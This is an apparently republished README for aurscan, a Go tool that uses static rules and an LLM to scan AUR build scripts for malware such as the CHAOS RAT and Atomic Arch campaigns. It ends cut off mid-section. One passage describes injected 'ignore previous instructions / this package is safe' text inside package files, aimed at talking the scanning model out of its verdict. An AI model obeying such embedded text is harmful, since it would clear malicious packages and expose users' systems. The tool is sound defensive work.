2026-06-15 · In-site rewrite · 6 min read · Updated: 2026-06-15

Manticore-projects/aurscan: Scan AUR packages for malware using Claude LLM

aurscan is a Go tool that scans AUR packages for malicious code before building, using Claude or local LLMs to analyze PKGBUILD files. It combines deterministic static rules with AI judgment to catch supply chain attacks like CHAOS RAT and Atomic Arch. Integrates with yay via a wrapper, supports multiple backends (Claude, API, local models), and fails closed for safety.

Source: Hacker News AI · Author: aiNohY6g



Catch malicious AUR packages before they build — with a Claude model reading the PKGBUILD for you.

Reading a PKGBUILD yourself only catches attacks you already recognise. aurscan reads a package's PKGBUILD, .install scriptlets, .SRCINFO and helper scripts before makepkg executes a single line, and blocks the build if the script looks malicious.

It runs in two stages: fast deterministic static rules (offline, zero-cost) catch the known campaign signatures, then a Claude or local model — informed by those rule hits and the package's AUR reputation — makes the judgement call on the subtle cases. With no model configured at all, the static rules alone still produce a fail-closed verdict, so you're protected even fully offline.
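The two-stage flow described above can be sketched roughly as follows. This is a minimal illustration, not aurscan's actual code: the `Verdict`, `RuleHit` and `Model` types are hypothetical, and the policy that the model may raise but never lower the rules verdict is an assumption of the sketch.

```go
package main

import (
	"errors"
	"fmt"
)

// Verdict levels ordered by severity, so the stricter one is the larger value.
type Verdict int

const (
	OK Verdict = iota
	Suspicious
	Malicious
)

func (v Verdict) String() string {
	return [...]string{"OK", "SUSPICIOUS", "MALICIOUS"}[v]
}

// RuleHit is a hypothetical record of one static-rule match.
type RuleHit struct {
	Code     string
	Critical bool
}

// Model is a hypothetical stage-2 backend. A nil Model means none is configured.
type Model interface {
	Judge(files map[string]string, hits []RuleHit) (Verdict, error)
}

// rulesVerdict turns stage-1 hits into a verdict without any model call.
func rulesVerdict(hits []RuleHit) Verdict {
	v := OK
	for _, h := range hits {
		if h.Critical {
			return Malicious
		}
		v = Suspicious
	}
	return v
}

// scan combines both stages. Assumed policy: a model error fails closed to
// Suspicious, and the model can raise but never lower the rules verdict.
func scan(files map[string]string, hits []RuleHit, m Model) Verdict {
	base := rulesVerdict(hits)
	if m == nil {
		return base
	}
	v, err := m.Judge(files, hits)
	if err != nil {
		v = Suspicious
	}
	if base > v {
		return base
	}
	return v
}

// fixedModel and brokenModel are stand-ins used only to exercise the sketch.
type fixedModel struct{ v Verdict }

func (f fixedModel) Judge(map[string]string, []RuleHit) (Verdict, error) { return f.v, nil }

type brokenModel struct{}

func (brokenModel) Judge(map[string]string, []RuleHit) (Verdict, error) {
	return OK, errors.New("backend unreachable")
}

func main() {
	crit := []RuleHit{{Code: "EX001", Critical: true}}
	fmt.Println(scan(nil, crit, nil))            // rules only, no model
	fmt.Println(scan(nil, nil, brokenModel{}))   // model error fails closed
	fmt.Println(scan(nil, crit, fixedModel{OK})) // model cannot downgrade
}
```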

Warning

An LLM scanner is a strong extra layer, not a guarantee. Keep building in a clean chroot, prefer official-repo packages, and stay wary of freshly-adopted orphaned packages. See Limitations.

$ syay firefox-patch-bin

scanning firefox-patch-bin (3 files) ...

[ MAL! ] firefox-patch-bin  confidence 95%
  A source labelled "patches" points at a personal GitHub repo unrelated to Firefox and is executed during build — the July 2025 CHAOS RAT vector.
  [critical] PKGBUILD: Disguised source pulls attacker-controlled code.
    > patches::git+https://github.com/.../zenbrowser-patch.git
  ↳ tokens: 12,431 in / 214 out · $0.0413

scanner usage: 1 call(s) · tokens: 12,431 in / 214 out · $0.0413
!! Installation blocked: 1 package(s) flagged MALICIOUS.
[A]bort (default) / [r]eport to mailing list & abort / [c]ontinue anyway:

Contents

Why

How it hooks into yay

Install

Authentication

Usage

Token & cost reporting

Configuration

How it stays safe

Project layout

Limitations

Contributing

🎯 Why

In July 2025 the AUR packages firefox-patch-bin, librewolf-fix-bin and zen-browser-patched-bin were uploaded with a source=() entry disguised as patches that actually pulled a personal GitHub repo and ran CHAOS RAT at build time. They looked like ordinary browser fixes; a quick glance at the PKGBUILD didn't obviously give them away. They were live for ~46 hours.

aurscan is built to flag exactly that class of thing — the unfamiliar trick, not just the one you happen to know.

In June 2026 the Atomic Arch campaign drove the point home at scale: attackers adopted 1,500+ orphaned AUR packages and — in some cases using git commit forgery to impersonate a trusted maintainer — added a post-install step running npm install atomic-lockfile (then bun install js-digest in a second wave), pulling a Rust credential stealer and, when built as root, an eBPF rootkit. The package name and history were unchanged; only the build instructions, and who wrote them, had quietly changed. aurscan's prompt and static rules encode these exact signatures.

🔌 How it hooks into yay

Note

A pacman hook is the wrong layer. PKGBUILD code runs as your user during makepkg, before pacman ever sees a package — so a PreTransaction hook fires only after any build-time payload has already executed. (Hook-based AUR "trust" tools score the maintainer at install time; they can't read what the build script actually does.)

aurscan intercepts at the only safe point — after download, before build — using yay's own editor step. The syay wrapper transparently points yay's editor at aurscan-edit and forces the edit prompt on, so the scanner runs on every AUR PKGBUILD yay is about to build:

| You type | What gets scanned |
| --- | --- |
| syay -S pkg | the named package |
| syay pkg | the package you pick from yay's interactive search menu |
| syay -Syu | every AUR upgrade |
| (any of the above) | …and their AUR dependencies, which yay also presents before building |

On a clean verdict it chains to your real $VISUAL/$EDITOR, so your manual review still happens. On a non-OK verdict it exits non-zero and yay aborts the build.
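A minimal sketch of that editor-gate behaviour, assuming the gate is invoked with the file paths yay would hand to an editor. `scanFiles` is a placeholder rather than the real scanner, the `vi` fallback is an assumption, and editor values that carry arguments (such as `code -w`) are not handled here.

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
)

// pickEditor returns the editor to chain to: $VISUAL, then $EDITOR, then a
// fallback. The "vi" fallback is an assumption of this sketch.
func pickEditor(getenv func(string) string) string {
	for _, key := range []string{"VISUAL", "EDITOR"} {
		if v := getenv(key); v != "" {
			return v
		}
	}
	return "vi"
}

// scanFiles is a placeholder for the real scan; it approves everything.
func scanFiles(paths []string) bool { return true }

// run returns the process exit code for one editor-gate invocation.
func run(paths []string) int {
	if !scanFiles(paths) {
		fmt.Fprintln(os.Stderr, "scan did not pass: not opening the editor")
		return 1 // a non-zero exit is what makes yay abort the build
	}
	// Clean verdict: hand over to the user's real editor for manual review.
	cmd := exec.Command(pickEditor(os.Getenv), paths...)
	cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr
	if err := cmd.Run(); err != nil {
		return 1
	}
	return 0
}

func main() {
	if len(os.Args) < 2 {
		fmt.Fprintln(os.Stderr, "usage: editor-gate FILE...")
		return
	}
	os.Exit(run(os.Args[1:]))
}
```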

📦 Install

git clone https://github.com/manticore-projects/aurscan
cd aurscan
./install.sh # build (needs Go) + install into /usr/local/bin

Then make it transparent — fish:

alias yay=syay
funcsave yay

bash / zsh

echo "alias yay=syay" >> ~/.bashrc # or ~/.zshrc

This installs three names that are all the same static binary: aurscan (CLI), syay (the yay wrapper), and aurscan-edit (the editor-gate yay invokes).
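One common way for a single binary to serve several names is to branch on the name it was invoked as. The sketch below shows that pattern; whether aurscan dispatches exactly this way is an assumption, and the mode strings are made up for illustration.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// modeFor maps the invoked name (argv[0]) to a behaviour. The three names
// come from the README; the returned mode labels are hypothetical.
func modeFor(argv0 string) string {
	switch filepath.Base(argv0) {
	case "syay":
		return "yay-wrapper"
	case "aurscan-edit":
		return "editor-gate"
	default:
		return "cli"
	}
}

func main() {
	fmt.Println("running as:", modeFor(os.Args[0]))
}
```

With this layout, `syay` and `aurscan-edit` can simply be links to the `aurscan` binary.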

| Task | Command |
| --- | --- |
| Update | git pull && ./install.sh |
| Uninstall | ./install.sh --uninstall |
| Rootless install | SUDO= PREFIX=~/.local ./install.sh |
| Build only | make build |
| Run tests | make test |
| UPX-pack the binary | make compress |
| Cross-build release artifacts | make release |

UPX packing (5.4 MB → 1.8 MB) is applied to the release artifacts only — it's deliberately kept out of the AUR PKGBUILD, since Arch users build from source.

🔑 Authentication

Auto-detected, in this order — option 1 needs no API key at all:

1. Claude Code CLI (claude) in PATH and logged in → uses your existing Claude subscription. Reports exact cost per scan.
2. ANTHROPIC_API_KEY → direct API (claude-sonnet-4-6 by default). Reports exact tokens; cost computed from a built-in price table.
3. Local / self-hosted model via AURSCAN_OPENAI_URL → any OpenAI-compatible /chat/completions endpoint (llama.cpp, Ollama, vLLM, LocalAI). Fully private; set AURSCAN_OPENAI_URL_FALLBACK for automatic failover (e.g. GPU host → local CPU). The model is swappable via AURSCAN_OPENAI_MODEL.
4. AURSCAN_BACKEND=/path/to/cmd → any executable that reads the prompt on stdin and prints the reply on stdout.
5. No backend at all → static rules still run and block on critical matches.
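The detection order above could be expressed along these lines. This is a sketch under assumptions: the returned labels are invented, the "logged in" check for the Claude CLI is not modelled, and an explicit override such as `AURSCAN_BACKEND=openai` is ignored for brevity.

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
)

// detectBackend walks the documented order and returns a hypothetical label
// for the first backend that looks available.
func detectBackend(getenv func(string) string, claudeInPath bool) string {
	switch {
	case claudeInPath:
		return "claude-cli"
	case getenv("ANTHROPIC_API_KEY") != "":
		return "anthropic-api"
	case getenv("AURSCAN_OPENAI_URL") != "":
		return "openai-compatible"
	case getenv("AURSCAN_BACKEND") != "":
		return "custom-command"
	default:
		return "rules-only"
	}
}

func main() {
	// exec.LookPath only tells us the binary exists, not that it is logged in.
	_, err := exec.LookPath("claude")
	fmt.Println("backend:", detectBackend(os.Getenv, err == nil))
}
```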

Local model example (llama.cpp / Ollama)

llama.cpp server, with a fallback to a second host

set -Ux AURSCAN_BACKEND openai
set -Ux AURSCAN_OPENAI_URL http://192.168.0.110:18080/v1/chat/completions
set -Ux AURSCAN_OPENAI_URL_FALLBACK http://127.0.0.1:18083/v1/chat/completions
set -Ux AURSCAN_OPENAI_MODEL qwen2.5-coder-32b

On a slow, CPU-only host (e.g. a handheld), the default 180 s budget can expire before the model finishes — you'll see context deadline exceeded. Raise it and make sure the model's context window is large enough for the prompt (a package is typically several thousand tokens; Ollama's 2048 default will silently truncate it):

set -Ux AURSCAN_TIMEOUT 900 # 15 minutes

and on the Ollama side, give the model real context, e.g.:

ollama run with a Modelfile setting `PARAMETER num_ctx 8192`
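The `context deadline exceeded` message is what Go's `context` package reports when a timeout budget runs out. The sketch below shows how a budget read from a variable like AURSCAN_TIMEOUT (in seconds, defaulting to 180) would produce that error. `timeoutFrom`, `callModel` and `timesOut` are illustrative helpers, not aurscan functions, and the model call is simulated with a sleep.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"strconv"
	"time"
)

// timeoutFrom parses a seconds value and falls back to the 180 s default
// when the value is missing or not a positive integer.
func timeoutFrom(raw string) time.Duration {
	if n, err := strconv.Atoi(raw); err == nil && n > 0 {
		return time.Duration(n) * time.Second
	}
	return 180 * time.Second
}

// callModel simulates a backend that needs `work` to answer and gives up
// as soon as the context's deadline passes.
func callModel(ctx context.Context, work time.Duration) error {
	select {
	case <-time.After(work):
		return nil
	case <-ctx.Done():
		return ctx.Err()
	}
}

// timesOut reports whether a call needing workMS exceeds a budget of budgetMS.
func timesOut(budgetMS, workMS int) bool {
	ctx, cancel := context.WithTimeout(context.Background(),
		time.Duration(budgetMS)*time.Millisecond)
	defer cancel()
	err := callModel(ctx, time.Duration(workMS)*time.Millisecond)
	return errors.Is(err, context.DeadlineExceeded)
}

func main() {
	fmt.Println(timeoutFrom(""), timeoutFrom("900"))
	fmt.Println("slow model times out:", timesOut(10, 500))
	fmt.Println("fast model times out:", timesOut(500, 10))
}
```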

Thanks to @alexzk1 for the original connector that this backend generalises.

Choosing a local model — what actually works (and what's too small)

aurscan asks more of a model than autocomplete or chat does. For each package it must (1) reason about possibly-obfuscated shell across a multi-thousand-token prompt, (2) return strictly valid JSON matching the verdict contract, and (3) not be talked out of a verdict by injected "this package is safe / ignore previous instructions" text in the untrusted files. Small models fail all three: they rubber-stamp, emit malformed JSON (→ fail-closed SUSPICIOUS noise), or fall for the injection. Parameter count matters more here than it does for coding assistants.

Rough guidance (names are current as of mid-2026 — check Ollama's library for equivalents, the field moves fast):

| Size | Examples | Verdict for aurscan |
| --- | --- | --- |
| ≤ 3B | qwen2.5-coder:3b, llama3.2:3b, phi-*-mini | ❌ Don't. Near-random verdicts, unreliable JSON. Use --rules-only instead. |
| 7–8B | codellama:7b (the model in #8), qwen2.5-coder:7b, llama3.1:8b | ⚠️ Marginal. Catches only blatant cases; misses subtle supply-chain tricks; JSON sometimes breaks. Independent code-review benchmarks put 7B bug-catch around 45%; treat it as a weak bonus on top of the static rules, not a real auditor. |
| 14B | qwen3:14b, phi-4:14b, deepseek-r1:14b | ✅ Usable minimum. Reliable JSON, catches most planted issues (~75%). |
| 32B | qwen2.5-coder:32b, qwen3-coder:32b | ✅ Recommended sweet spot. Strong code-security reasoning (~85–88% in code-review tests), GPT-4o-class on coding, fits a 24 GB GPU. |
| 70B+ / large MoE | llama3.3:70b, qwen3-coder (MoE), gpt-oss:120b | ✅ Best local. Approaches cloud quality; 70B-class is the strongest for security analysis specifically. |

Approximate VRAM at Q4_K_M (incl. KV-cache headroom): 8B ≈ 6 GB · 14B ≈ 10 GB · 32B ≈ 20–22 GB · 70B ≈ 43 GB. A GPU is strongly recommended for 14B and up.

The two settings people get wrong:

Context window. Ollama defaults to num_ctx 2048, which silently truncates the package out of the prompt — the model then "scans" almost nothing. Set num_ctx ≥ 8192 (16384 recommended). Bake it into a model so the OpenAI-compatible endpoint always uses it:

printf 'FROM qwen2.5-coder:32b\nPARAMETER num_ctx 16384\n' > Modelfile
ollama create aurscan-qwen -f Modelfile

set -Ux AURSCAN_BACKEND openai
set -Ux AURSCAN_OPENAI_URL http://127.0.0.1:11434/v1/chat/completions
set -Ux AURSCAN_OPENAI_MODEL aurscan-qwen

Timeout on slow hardware. CPU-only inference (handhelds, NUCs) runs at a few tokens/sec — a scan can take minutes. Raise the budget: set -Ux AURSCAN_TIMEOUT 900. If that's still painful, drop to a 7–14B model or just run --rules-only.

You are never left unprotected by a weak model: the deterministic static rules always run, and any model error, timeout, or unparseable output fails closed to SUSPICIOUS. A package too large for the model's context window cannot be read in full by most local models, but the static rules still cover it.
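Fail-closed handling of a model reply might look like the sketch below. The JSON shape (`verdict`, `confidence`) is a guess, since the real verdict contract is not shown here; the point is only that every failure path lands on SUSPICIOUS instead of OK.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// reply is a hypothetical verdict shape, not aurscan's actual contract.
type reply struct {
	Verdict    string `json:"verdict"`
	Confidence int    `json:"confidence"`
}

// errTimeout stands in for any backend failure in the examples below.
var errTimeout = errors.New("context deadline exceeded")

// parseVerdict returns the model's verdict only when the call succeeded and
// the output is a single, strictly valid JSON object with a known verdict.
func parseVerdict(raw string, callErr error) string {
	if callErr != nil {
		return "SUSPICIOUS" // backend error or timeout
	}
	dec := json.NewDecoder(strings.NewReader(raw))
	dec.DisallowUnknownFields()
	var r reply
	if err := dec.Decode(&r); err != nil {
		return "SUSPICIOUS" // malformed JSON or unexpected fields
	}
	if dec.More() {
		return "SUSPICIOUS" // trailing text after the JSON object
	}
	switch r.Verdict {
	case "OK", "SUSPICIOUS", "MALICIOUS":
		return r.Verdict
	}
	return "SUSPICIOUS" // unknown verdict value
}

func main() {
	fmt.Println(parseVerdict(`{"verdict":"OK","confidence":90}`, nil))
	fmt.Println(parseVerdict(`Sure! {"verdict":"OK"}`, nil))
	fmt.Println(parseVerdict("", errTimeout))
}
```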

Getting an Anthropic API key (option 2)

Create one at console.anthropic.com → Settings → API keys, add billing, then:

set -Ux ANTHROPIC_API_KEY sk-ant-...

A typical scan is a few thousand input tokens — well under a cent on the API, free against a subscription.
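As a rough illustration of how a per-scan cost can be derived from token counts and a price table: the model name and the per-million-token prices below are placeholders, not aurscan's built-in table or current Anthropic pricing.

```go
package main

import "fmt"

// price is USD per million tokens.
type price struct{ inPerM, outPerM float64 }

// prices is a placeholder table; the entry is illustrative only.
var prices = map[string]price{
	"example-model": {inPerM: 3.00, outPerM: 15.00},
}

// costUSD returns the cost of one call, or false if the model is unknown.
func costUSD(model string, in, out int) (float64, bool) {
	p, ok := prices[model]
	if !ok {
		return 0, false
	}
	return (float64(in)*p.inPerM + float64(out)*p.outPerM) / 1e6, true
}

func main() {
	if c, ok := costUSD("example-model", 2000, 200); ok {
		fmt.Printf("tokens: %d in / %d out · $%.4f\n", 2000, 200, c)
	}
}
```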

🚀 Usage

syay # normal yay usage; the scanner gates AUR builds
aurscan [...] # standalone scan (fetches the AUR snapshot in memory)
aurscan ./builddir # scan a local build directory
aurscan --update-check # audit pending AUR updates without installing anything

When a package is flagged:

Abort — the default; pressing Enter is always safe.

Report — drafts /tmp/aurscan-report-.txt, offers to open your mail client to [email protected] (where the CHAOS RAT cleanup was coordinated), and reminds you to file an AUR deletion request. Never sends automatically.

Continue — requires typing INSTALL, so nothing slips through by reflex.
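The three choices above can be modelled as a small decision function in which anything other than an explicit, confirmed "continue" aborts. This is a sketch: the `action` type and the two-step input handling are assumptions about how such a prompt could be wired.

```go
package main

import (
	"fmt"
	"strings"
)

type action int

const (
	abort action = iota
	report
	proceed
)

// decide interprets the answer to the abort/report/continue prompt. confirm
// is the follow-up line and is only consulted when the answer is "c".
func decide(answer, confirm string) action {
	switch strings.ToLower(strings.TrimSpace(answer)) {
	case "r":
		return report
	case "c":
		// Continuing needs the literal word INSTALL, case-sensitive.
		if strings.TrimSpace(confirm) == "INSTALL" {
			return proceed
		}
	}
	return abort // Enter, "a", typos and failed confirmations all abort
}

func main() {
	fmt.Println(decide("", "") == abort)
	fmt.Println(decide("c", "install") == abort)
	fmt.Println(decide("c", "INSTALL") == proceed)
}
```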

Exit codes: 0 clean/approved · 1 suspicious-abort · 2 malicious-abort · 3 operational error.
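For scripting around aurscan, the exit codes listed above map onto outcomes roughly as in this sketch. The function signature and verdict strings are assumptions; treating an unrecognised verdict as suspicious is a choice made here to stay fail-closed.

```go
package main

import (
	"errors"
	"fmt"
)

// errOp stands in for any operational failure (network, I/O, bad flags).
var errOp = errors.New("operational error")

// exitCode maps a scan outcome to the documented process exit codes.
func exitCode(verdict string, approved bool, err error) int {
	switch {
	case err != nil:
		return 3 // operational error
	case approved || verdict == "OK":
		return 0 // clean, or explicitly approved by the user
	case verdict == "MALICIOUS":
		return 2 // malicious-abort
	default:
		return 1 // suspicious-abort, including unknown verdicts
	}
}

func main() {
	fmt.Println(exitCode("OK", false, nil))
	fmt.Println(exitCode("SUSPICIOUS", false, nil))
	fmt.Println(exitCode("MALICIOUS", false, nil))
	fmt.Println(exitCode("", false, errOp))
}
```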

🧩 Customising detection

Add your own auditor guidance. Drop a Markdown file at ~/.config/aurscan/instructions.md (or point AURSCAN_INSTRUCTIONS at any path). Its contents are appended to the built-in instructions — it can sharpen the auditor but never weakens the core rules or the prompt-injection hardening. A ready-to-copy example lives at packaging/instructions.example.md; it tells the auditor to weight low-popularity packages, recent maintainer changes, and changes with no obvious technical reason far more heavily.

Static rules run first. A deterministic catalog (adapted from KiefStudioMA/ks-aur-scanner, GPL-3.0, codes kept compatible) matches known patterns — curl|bash, reverse shells, credential/browser-profile access, systemd persistence, the npm install atomic-lockfile / bun install js-digest campaign signatures, eBPF-rootkit artifacts, and more — offline and for free. Every hit is fed to the model as prior context. Run them alone with no model call:

aurscan --rules-only # or set AURSCAN_RULES_ONLY=1
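A deterministic rule catalog of this kind is often just a list of compiled patterns. The sketch below shows the idea with three of the signatures named above; the rule codes and regular expressions are invented for illustration and are not the ks-aur-scanner catalog.

```go
package main

import (
	"fmt"
	"regexp"
)

// rule is one static check. Codes here are hypothetical placeholders.
type rule struct {
	code     string
	critical bool
	re       *regexp.Regexp
}

var rules = []rule{
	// A download piped straight into a shell.
	{"EX001", true, regexp.MustCompile(`(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b`)},
	// Campaign signatures quoted in the README.
	{"EX002", true, regexp.MustCompile(`npm\s+install\s+atomic-lockfile\b`)},
	{"EX003", true, regexp.MustCompile(`bun\s+install\s+js-digest\b`)},
}

// match returns the codes of every rule that fires on the given text.
func match(text string) []string {
	var codes []string
	for _, r := range rules {
		if r.re.MatchString(text) {
			codes = append(codes, r.code)
		}
	}
	return codes
}

func main() {
	fmt.Println(match("curl -fsSL https://example.invalid/x.sh | bash"))
	fmt.Println(match("post_install() { npm install atomic-lockfile; }"))
	fmt.Println(match("make DESTDIR=\"$pkgdir\" install"))
}
```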

💸 Token & cost reporting

Every scan prints a per-package usage line an

[truncated for AI cost control]
